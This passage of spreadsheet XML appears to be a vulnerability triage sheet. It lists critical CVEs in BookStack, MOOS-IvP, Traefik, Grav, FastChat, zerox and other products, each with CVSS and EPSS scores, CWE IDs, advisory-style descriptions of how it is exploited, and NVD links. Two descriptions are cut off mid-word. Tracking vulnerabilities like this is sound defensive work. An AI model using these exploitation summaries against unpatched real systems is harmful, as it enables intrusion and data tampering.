          <t>BookStack before 26.05.4 contains a stored cross-site scripting vulnerability in the drawing upload endpoint that accepts unvalidated base64 content and stores it without content inspection. Attackers with editor permissions can upload SVG files containing scripts that execute in administrator browsers when accessed through the image gallery API without content-type validation or CSP headers.</t>
        </is>
      </c>
      <c r="M509" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84695</t>
        </is>
      </c>
    </row>
    <row r="510">
      <c r="A510" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B510" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84696</t>
        </is>
      </c>
      <c r="C510" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D510" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E510" s="5" t="inlineStr"/>
      <c r="F510" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G510" s="5" t="inlineStr"/>
      <c r="H510" s="5" t="inlineStr"/>
      <c r="I510" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="J510" s="5" t="inlineStr"/>
      <c r="K510" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="L510" s="5" t="inlineStr">
        <is>
          <t>Phison PS3111-S11 controller firmware versions through SBFQT1.3 expose privileged vendor unique commands over the ATA interface with absent or defeatable authentication mechanisms. Attackers can bypass the weak CRC-16 based unlock handshake or exploit builds with no VUC lock to read and write controller memory and raw flash, persisting implants across power cycles.</t>
        </is>
      </c>
      <c r="M510" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84696</t>
        </is>
      </c>
    </row>
    <row r="511">
      <c r="A511" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B511" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85146</t>
        </is>
      </c>
      <c r="C511" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D511" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E511" s="5" t="inlineStr"/>
      <c r="F511" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G511" s="5" t="inlineStr"/>
      <c r="H511" s="5" t="inlineStr"/>
      <c r="I511" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J511" s="5" t="inlineStr"/>
      <c r="K511" s="5" t="inlineStr">
        <is>
          <t>CWE-798</t>
        </is>
      </c>
      <c r="L511" s="5" t="inlineStr">
        <is>
          <t>SmartIT Desktop Manager developed by Lightstar has a Use of Hard-coded Credentials vulnerability. Unauthenticated remote attackers can obtain the SSH service account credentials and passwords for the SmartIT Agent directly from the application source code.</t>
        </is>
      </c>
      <c r="M511" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85146</t>
        </is>
      </c>
    </row>
    <row r="512">
      <c r="A512" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B512" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85148</t>
        </is>
      </c>
      <c r="C512" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D512" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E512" s="5" t="inlineStr"/>
      <c r="F512" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G512" s="5" t="inlineStr"/>
      <c r="H512" s="5" t="inlineStr"/>
      <c r="I512" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J512" s="5" t="inlineStr"/>
      <c r="K512" s="5" t="inlineStr">
        <is>
          <t>CWE-798</t>
        </is>
      </c>
      <c r="L512" s="5" t="inlineStr">
        <is>
          <t>SmartIT Desktop Manager developed by Lightstar has a Use of Hard-coded Credentials vulnerability. Unauthenticated remote attackers can exploit a fixed password to remotely access user hosts.</t>
        </is>
      </c>
      <c r="M512" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85148</t>
        </is>
      </c>
    </row>
    <row r="513">
      <c r="A513" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B513" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85154</t>
        </is>
      </c>
      <c r="C513" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D513" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E513" s="5" t="inlineStr"/>
      <c r="F513" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G513" s="5" t="inlineStr"/>
      <c r="H513" s="5" t="inlineStr"/>
      <c r="I513" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J513" s="5" t="inlineStr"/>
      <c r="K513" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="L513" s="5" t="inlineStr">
        <is>
          <t>WWBN AVideo contains an authentication failure vulnerability where the video_id_hash credential is a non-expiring, non-revocable bearer token that grants full administrator session access to the video owner's account. Attackers who obtain a video_id_hash can replay it indefinitely to authenticate as the video owner with full privileges, and the credential remains valid even after the owner changes their password.</t>
        </is>
      </c>
      <c r="M513" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85154</t>
        </is>
      </c>
    </row>
    <row r="514">
      <c r="A514" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B514" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85183</t>
        </is>
      </c>
      <c r="C514" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D514" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E514" s="5" t="inlineStr"/>
      <c r="F514" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G514" s="5" t="inlineStr"/>
      <c r="H514" s="5" t="inlineStr"/>
      <c r="I514" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J514" s="5" t="inlineStr"/>
      <c r="K514" s="5" t="inlineStr">
        <is>
          <t>CWE-1385</t>
        </is>
      </c>
      <c r="L514" s="5" t="inlineStr">
        <is>
          <t>Taipy configures its socket.io server with wildcard CORS origin and credential flag enabled, allowing any web page to establish credentialed WebSocket connections to victim applications. Attackers can open socket.io sessions from arbitrary domains and invoke state variable modifications and action callbacks without CSRF protection.</t>
        </is>
      </c>
      <c r="M514" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85183</t>
        </is>
      </c>
    </row>
    <row r="515">
      <c r="A515" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B515" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85391</t>
        </is>
      </c>
      <c r="C515" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D515" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E515" s="5" t="inlineStr"/>
      <c r="F515" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G515" s="5" t="inlineStr">
        <is>
          <t>docker</t>
        </is>
      </c>
      <c r="H515" s="5" t="inlineStr"/>
      <c r="I515" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J515" s="5" t="inlineStr"/>
      <c r="K515" s="5" t="inlineStr">
        <is>
          <t>CWE-798</t>
        </is>
      </c>
      <c r="L515" s="5" t="inlineStr">
        <is>
          <t>Peppermint through 0.5.5 contains a hardcoded JWT signing secret in docker-compose.yml that allows unauthenticated attackers to forge session tokens for any account. Attackers can use the published secret to mint valid tokens for arbitrary user IDs and access protected endpoints without credentials.</t>
        </is>
      </c>
      <c r="M515" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85391</t>
        </is>
      </c>
    </row>
    <row r="516">
      <c r="A516" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B516" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85424</t>
        </is>
      </c>
      <c r="C516" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D516" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E516" s="5" t="inlineStr"/>
      <c r="F516" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G516" s="5" t="inlineStr"/>
      <c r="H516" s="5" t="inlineStr"/>
      <c r="I516" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J516" s="5" t="inlineStr"/>
      <c r="K516" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="L516" s="5" t="inlineStr">
        <is>
          <t>MOOS core-moos through 10.4.0 lacks authentication in the wire protocol, allowing unauthenticated clients to connect with full publish, subscribe, and database clear privileges. Attackers can bypass the compile-time protocol string check and connect with arbitrary client names to execute privileged operations including DB_CLEAR which resets all variables and clears client mail queues.</t>
        </is>
      </c>
      <c r="M516" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85424</t>
        </is>
      </c>
    </row>
    <row r="517">
      <c r="A517" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B517" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85425</t>
        </is>
      </c>
      <c r="C517" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D517" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E517" s="5" t="inlineStr"/>
      <c r="F517" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="G517" s="5" t="inlineStr"/>
      <c r="H517" s="5" t="inlineStr"/>
      <c r="I517" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J517" s="5" t="inlineStr"/>
      <c r="K517" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L517" s="5" t="inlineStr">
        <is>
          <t>MOOS-IvP iSay through 24.8.1 contains a remote code execution vulnerability in the SAY_MOOS variable handler that passes unsanitized text to a shell command. Attackers can publish SAY_MOOS messages containing backticks or command substitution syntax to execute arbitrary commands as the iSay process user.</t>
        </is>
      </c>
      <c r="M517" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85425</t>
        </is>
      </c>
    </row>
    <row r="518">
      <c r="A518" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B518" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85426</t>
        </is>
      </c>
      <c r="C518" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D518" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E518" s="5" t="inlineStr"/>
      <c r="F518" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G518" s="5" t="inlineStr"/>
      <c r="H518" s="5" t="inlineStr"/>
      <c r="I518" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J518" s="5" t="inlineStr"/>
      <c r="K518" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L518" s="5" t="inlineStr">
        <is>
          <t>MOOS-IvP uMemWatch through 24.8.1 constructs shell commands from attacker-chosen MOOS client names without sanitization. Attackers can inject shell metacharacters into client names to execute arbitrary commands as the uMemWatch process user through unquoted redirection targets in system calls.</t>
        </is>
      </c>
      <c r="M518" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85426</t>
        </is>
      </c>
    </row>
    <row r="519">
      <c r="A519" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B519" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85428</t>
        </is>
      </c>
      <c r="C519" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D519" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E519" s="5" t="inlineStr"/>
      <c r="F519" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G519" s="5" t="inlineStr"/>
      <c r="H519" s="5" t="inlineStr"/>
      <c r="I519" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J519" s="5" t="inlineStr"/>
      <c r="K519" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="L519" s="5" t="inlineStr">
        <is>
          <t>MOOS core-moos through 10.4.0 contains an authentication bypass vulnerability in the optional MOOSDB HTTP server that allows unauthenticated clients to write variables. Attackers can send HTTP requests with variable names and values to the MOOSDB HTTP server port to modify MOOS variables including actuator and override commands without authentication.</t>
        </is>
      </c>
      <c r="M519" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85428</t>
        </is>
      </c>
    </row>
    <row r="520">
      <c r="A520" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B520" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85433</t>
        </is>
      </c>
      <c r="C520" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D520" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E520" s="5" t="inlineStr"/>
      <c r="F520" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G520" s="5" t="inlineStr"/>
      <c r="H520" s="5" t="inlineStr"/>
      <c r="I520" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J520" s="5" t="inlineStr"/>
      <c r="K520" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L520" s="5" t="inlineStr">
        <is>
          <t>MOOS essential-moos pShare through 10.0.1 fails to properly authorize PSHARE_CMD messages, allowing any publisher to reconfigure network routes and listeners at runtime. Attackers can send crafted PSHARE_CMD messages with cmd=output or cmd=input parameters to open new listeners on arbitrary addresses and redirect or duplicate bus traffic to attacker-controlled destinations.</t>
        </is>
      </c>
      <c r="M520" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85433</t>
        </is>
      </c>
    </row>
    <row r="521">
      <c r="A521" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B521" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85434</t>
        </is>
      </c>
      <c r="C521" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D521" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E521" s="5" t="inlineStr"/>
      <c r="F521" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G521" s="5" t="inlineStr"/>
      <c r="H521" s="5" t="inlineStr"/>
      <c r="I521" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J521" s="5" t="inlineStr"/>
      <c r="K521" s="5" t="inlineStr">
        <is>
          <t>CWE-345</t>
        </is>
      </c>
      <c r="L521" s="5" t="inlineStr">
        <is>
          <t>MOOS-IvP uFldShoreBroker through 24.8.1 fails to verify node ping authenticity before creating outbound bridge routes. Attackers can publish NODE_BROKER_PING messages with crafted HostRecord data to redirect bridged variables to attacker-controlled addresses.</t>
        </is>
      </c>
      <c r="M521" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85434</t>
        </is>
      </c>
    </row>
    <row r="522">
      <c r="A522" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B522" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85435</t>
        </is>
      </c>
      <c r="C522" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D522" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E522" s="5" t="inlineStr"/>
      <c r="F522" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G522" s="5" t="inlineStr"/>
      <c r="H522" s="5" t="inlineStr"/>
      <c r="I522" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J522" s="5" t="inlineStr"/>
      <c r="K522" s="5" t="inlineStr">
        <is>
          <t>CWE-345</t>
        </is>
      </c>
      <c r="L522" s="5" t="inlineStr">
        <is>
          <t>MOOS-IvP u</t>
        </is>
      </c>
      <c r="M522" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85435</t>
        </is>
      </c>
    </row>
    <row r="523">
      <c r="A523" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B523" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85437</t>
        </is>
      </c>
      <c r="C523" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D523" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E523" s="5" t="inlineStr"/>
      <c r="F523" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G523" s="5" t="inlineStr"/>
      <c r="H523" s="5" t="inlineStr"/>
      <c r="I523" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J523" s="5" t="inlineStr"/>
      <c r="K523" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="L523" s="5" t="inlineStr">
        <is>
          <t>MOOS-IvP through 24.8.1 contains multiple buffer overflow vulnerabilities in IvP function string decoders that trust attacker-controlled length fields without validation. Attackers can craft malicious encoded strings with mismatched declared and actual field lengths to overflow heap and stack buffers, potentially achieving remote code execution through MOOS variables or alog files.</t>
        </is>
      </c>
      <c r="M523" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85437</t>
        </is>
      </c>
    </row>
    <row r="524">
      <c r="A524" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B524" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85438</t>
        </is>
      </c>
      <c r="C524" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D524" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E524" s="5" t="inlineStr"/>
      <c r="F524" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G524" s="5" t="inlineStr"/>
      <c r="H524" s="5" t="inlineStr"/>
      <c r="I524" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J524" s="5" t="inlineStr"/>
      <c r="K524" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="L524" s="5" t="inlineStr">
        <is>
          <t>MOOS-IvP t</t>
        </is>
      </c>
      <c r="M524" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85438</t>
        </is>
      </c>
    </row>
    <row r="525">
      <c r="A525" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B525" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85440</t>
        </is>
      </c>
      <c r="C525" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D525" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E525" s="5" t="inlineStr"/>
      <c r="F525" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G525" s="5" t="inlineStr"/>
      <c r="H525" s="5" t="inlineStr"/>
      <c r="I525" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J525" s="5" t="inlineStr"/>
      <c r="K525" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="L525" s="5" t="inlineStr">
        <is>
          <t>MOOS core-moos through 10.4.0 contains a pre-authentication heap overflow vulnerability in MOOSCommPkt packet handling that allows remote attackers to write arbitrary data by declaring a negative packet length. Attackers can exploit the signed integer check in InflateTo() and negative size conversion in recv() to overflow a four-byte heap buffer during the HandShake phase before authentication.</t>
        </is>
      </c>
      <c r="M525" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85440</t>
        </is>
      </c>
    </row>
    <row r="526">
      <c r="A526" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B526" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85595</t>
        </is>
      </c>
      <c r="C526" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D526" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E526" s="5" t="inlineStr"/>
      <c r="F526" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G526" s="5" t="inlineStr"/>
      <c r="H526" s="5" t="inlineStr"/>
      <c r="I526" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J526" s="5" t="inlineStr"/>
      <c r="K526" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="L526" s="5" t="inlineStr">
        <is>
          <t>Traefik versions before v2.11.55 and versions v3.0.0 through v3.7.10 contain an authentication bypass vulnerability in the digestAuth middleware where unknown usernames receive an empty secret instead of rejection. Attackers can compute a valid digest response using the empty secret and arbitrary credentials to bypass authentication on any digestAuth-protected route without a valid username or password.</t>
        </is>
      </c>
      <c r="M526" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85595</t>
        </is>
      </c>
    </row>
    <row r="527">
      <c r="A527" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B527" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85602</t>
        </is>
      </c>
      <c r="C527" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D527" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E527" s="5" t="inlineStr"/>
      <c r="F527" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G527" s="5" t="inlineStr"/>
      <c r="H527" s="5" t="inlineStr"/>
      <c r="I527" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J527" s="5" t="inlineStr"/>
      <c r="K527" s="5" t="inlineStr">
        <is>
          <t>CWE-807</t>
        </is>
      </c>
      <c r="L527" s="5" t="inlineStr">
        <is>
          <t>The Grav Form plugin (getgrav/grav-plugin-form) versions 8.0.6 through 9.1.19 select the reCAPTCHA version to validate based solely on which response field key is present in the submitted payload. On a site configured for reCAPTCHA v3, an anonymous attacker can place their v3 token under the v2 field name (g-recaptcha-response instead of token), causing validation to use the v2 branch, which never applies the score threshold or verifies the expected action. This results in a complete bypass of reCAPTCHA v3 bot protection. The issue is fixed in version 9.1.20.</t>
        </is>
      </c>
      <c r="M527" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85602</t>
        </is>
      </c>
    </row>
    <row r="528">
      <c r="A528" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B528" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85663</t>
        </is>
      </c>
      <c r="C528" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D528" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E528" s="5" t="inlineStr"/>
      <c r="F528" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G528" s="5" t="inlineStr"/>
      <c r="H528" s="5" t="inlineStr"/>
      <c r="I528" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J528" s="5" t="inlineStr"/>
      <c r="K528" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="L528" s="5" t="inlineStr">
        <is>
          <t>Aim 3.29.1 remote tracking server fails to authenticate requests and dispatches arbitrary methods through getattr without allowlist validation. Unauthenticated attackers can register clients, instantiate Repo resources, and invoke arbitrary methods to read experiments or delete runs.</t>
        </is>
      </c>
      <c r="M528" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85663</t>
        </is>
      </c>
    </row>
    <row r="529">
      <c r="A529" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B529" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85667</t>
        </is>
      </c>
      <c r="C529" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D529" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E529" s="5" t="inlineStr"/>
      <c r="F529" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G529" s="5" t="inlineStr"/>
      <c r="H529" s="5" t="inlineStr"/>
      <c r="I529" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J529" s="5" t="inlineStr"/>
      <c r="K529" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="L529" s="5" t="inlineStr">
        <is>
          <t>xiaobei through 5.5.2 fails to implement authentication or signature validation on webhook endpoints, allowing unauthenticated attackers to inject arbitrary messages into the agent pipeline. Attackers can publish malicious messages via the /webhook_worktool handler and exploit unvalidated media URL fetching to perform server-side request forgery against internal services.</t>
        </is>
      </c>
      <c r="M529" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85667</t>
        </is>
      </c>
    </row>
    <row r="530">
      <c r="A530" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B530" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85672</t>
        </is>
      </c>
      <c r="C530" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D530" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E530" s="5" t="inlineStr"/>
      <c r="F530" s="5" t="n">
        <v>0.015</v>
      </c>
      <c r="G530" s="5" t="inlineStr"/>
      <c r="H530" s="5" t="inlineStr"/>
      <c r="I530" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J530" s="5" t="inlineStr"/>
      <c r="K530" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L530" s="5" t="inlineStr">
        <is>
          <t>zerox 1.1.20 contains an OS command injection vulnerability in the file download mechanism where the temporary file extension derived from document URLs is interpolated unsanitized into shell commands executed by poppler utilities. Attackers can craft document URLs with malicious file extensions containing command substitution syntax to execute arbitrary OS commands before document processing occurs.</t>
        </is>
      </c>
      <c r="M530" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85672</t>
        </is>
      </c>
    </row>
    <row r="531">
      <c r="A531" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B531" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85695</t>
        </is>
      </c>
      <c r="C531" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D531" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E531" s="5" t="inlineStr"/>
      <c r="F531" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G531" s="5" t="inlineStr"/>
      <c r="H531" s="5" t="inlineStr"/>
      <c r="I531" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J531" s="5" t="inlineStr"/>
      <c r="K531" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="L531" s="5" t="inlineStr">
        <is>
          <t>FastChat contains an authentication bypass vulnerability in the /register_worker endpoint that allows unauthenticated attackers to register arbitrary worker addresses and perform server-side request forgery. Attackers can register malicious workers under victim model names to intercept user prompts, images, and responses, or probe internal network ports across the worker mesh.</t>
        </is>
      </c>
      <c r="M531" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85695</t>
        </is>
      </c>
    </row>
    <row r="532">
      <c r="A532" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B532" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85696</t>
        </is>
      </c>
      <c r="C532" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D532" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E532" s="5" t="inlineStr"/>
      <c r="F532" s="5" t="n">
        <v>0.015</v>
      </c>
      <c r="G532" s="5" t="inlineStr"/>
      <c r="H532" s="5" t="inlineStr"/>
      <c r="I532" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J532" s="5" t="inlineStr"/>
      <c r="K532" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L532" s="5" t="inlineStr">
        <is>
